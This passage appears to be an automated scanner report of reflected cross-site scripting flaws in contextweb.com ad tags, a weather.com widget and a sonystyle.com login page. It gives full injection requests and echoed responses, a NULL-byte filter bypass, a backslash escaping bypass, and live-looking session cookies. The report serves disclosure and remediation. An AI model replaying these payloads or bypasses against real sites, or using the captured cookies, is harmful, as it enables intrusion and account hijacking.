This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X9030707"%3balert(1)//ccec8b5486e&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:07 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X9030707";alert(1)//ccec8b5486e";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _
...[SNIP]...

5.115. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f535a"%3balert(1)//aa87427b8a9 was submitted in the cwheight parameter. This input was echoed as f535a";alert(1)//aa87427b8a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90f535a"%3balert(1)//aa87427b8a9&cwpnet=1&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:22:16 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="523987";var ct="75238";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90f535a";alert(1)//aa87427b8a9";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

5.116. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f824"%3balert(1)//5d114f1e2c3 was submitted in the cwpid parameter. This input was echoed as 7f824";alert(1)//5d114f1e2c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=5267357f824"%3balert(1)//5d114f1e2c3&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:17 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="5267357f824";alert(1)//5d114f1e2c3";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

5.117. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0443"%3balert(1)//1a3fa6ca155 was submitted in the cwpnet parameter. This input was echoed as a0443";alert(1)//1a3fa6ca155 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90&cwpnet=1a0443"%3balert(1)//1a3fa6ca155&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 13 May 02011 21:49:10 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5916
Date: Mon, 16 May 2011 01:22:22 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:09:02 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="75238";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="523987";var ct="75238";var cf="728X90";var cn="1a0443";alert(1)//1a3fa6ca155";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl=
...[SNIP]...

5.118. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3ccc"%3balert(1)//92d61175cab was submitted in the cwrun parameter. This input was echoed as f3ccc";alert(1)//92d61175cab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200f3ccc"%3balert(1)//92d61175cab&cwadformat=728X90&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:00 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200f3ccc";alert(1)//92d61175cab";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;
...[SNIP]...

5.119. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ca89"%3balert(1)//7f75bf95394 was submitted in the cwtagid parameter. This input was echoed as 2ca89";alert(1)//7f75bf95394 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=752382ca89"%3balert(1)//7f75bf95394 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP201
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Sat, 14 May 02011 11:14:24 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5944
Date: Mon, 16 May 2011 01:22:27 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:09:07 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="752382ca89";alert(1)//7f75bf95394";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="523987";var ct="752382ca89";alert(1)//7f75bf95394";var cf="728X90";var cn="1";String.prototype.cwcon
...[SNIP]...

5.120. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00dbddc"%3balert(1)//2ec3f6439ea was submitted in the cwwidth parameter. This input was echoed as dbddc";alert(1)//2ec3f6439ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=526735&cwwidth=728%00dbddc"%3balert(1)//2ec3f6439ea&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:27 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728.dbddc";alert(1)//2ec3f6439ea";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="und
...[SNIP]...

5.121. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94823"%3balert(1)//da5a2530254 was submitted in the cwwidth parameter. This input was echoed as 94823";alert(1)//da5a2530254 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=72894823"%3balert(1)//da5a2530254&cwheight=90&cwpnet=1&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 13 May 02011 21:46:58 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:21:25 GMT
Content-Length: 5916
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:08:05 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="75238";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="72894823";alert(1)//da5a2530254";var ch="90";var cads="0";var cp="523987";var ct="75238";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];
...[SNIP]...

5.122. http://wow.weather.com/weather/wow/module/USNY0400 [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wow.weather.com
Path:   /weather/wow/module/USNY0400

Issue detail

The value of the config request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c278\'%3balert(1)//0c2af714aa4 was submitted in the config parameter. This input was echoed as 1c278\\';alert(1)//0c2af714aa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b83814781c278\'%3balert(1)//0c2af714aa4&proto=http:&target=wx_module HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:20:23 GMT
Server: Apache
SVRNAME: web2x07
Vary: Accept-Encoding
Content-Length: 5721
Content-Type: text/html


if (document.getElementById && !document.getElementById('wx_wow_css') )
{
var head = document.getElementsByTagName('head')[0];
var link = document.createElement('link');

...[SNIP]...
<A HREF="http://wowweb.weather.com?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b83814781c278\\';alert(1)//0c2af714aa4&par=WOWsnull_null&site=null&cm_ven=WOWsnull&cm_cat=null&code=brand&promo=logo&cm_ite=brand&cm_pla=logo" style="text-decoration:none;" target="wownewwin">
...[SNIP]...

5.123. http://wow.weather.com/weather/wow/module/USNY0400 [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wow.weather.com
Path:   /weather/wow/module/USNY0400

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1b30'%3balert(1)//5bc7f5a3bd7 was submitted in the target parameter. This input was echoed as e1b30';alert(1)//5bc7f5a3bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478&proto=http:&target=wx_modulee1b30'%3balert(1)//5bc7f5a3bd7 HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:09 GMT
Server: Apache
SVRNAME: web2x06
Vary: Accept-Encoding
Content-Length: 5483
Content-Type: text/html


if (document.getElementById && !document.getElementById('wx_wow_css') )
{
var head = document.getElementsByTagName('head')[0];
var link = document.createElement('link');

...[SNIP]...
d, moduleHTML)

} else {
    document.getElementById(mydivId).className = "wow_container";
document.getElementById(mydivId).innerHTML = moduleHTML;

}

}
init('wx_modulee1b30';alert(1)//5bc7f5a3bd7','<div style="border:0px 0px 0px 0px;padding:0px 0px 0px 0px;margin: 0px 0px 0px 0px;position:relative; width:238px; height:60px; overflow:hidden;">
...[SNIP]...

5.124. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/LogonForm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc38b"><script>alert(1)</script>81999f0f744 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=fc38b"><script>alert(1)</script>81999f0f744
Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response

HTTP/1.1 200 OK
ntCoent-Length: 87894
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 87894
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:25:50 GMT
Connection: keep-alive
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.e
...[SNIP]...
<input type="hidden" value="http://www.google.com/search?hl=en&q=fc38b"><script>alert(1)</script>81999f0f744" name="redirectURL"/>
...[SNIP]...

5.125. http://f.nexac.com/e/a-677/s-2140.xgi [na_id cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f.nexac.com
Path:   /e/a-677/s-2140.xgi

Issue detail

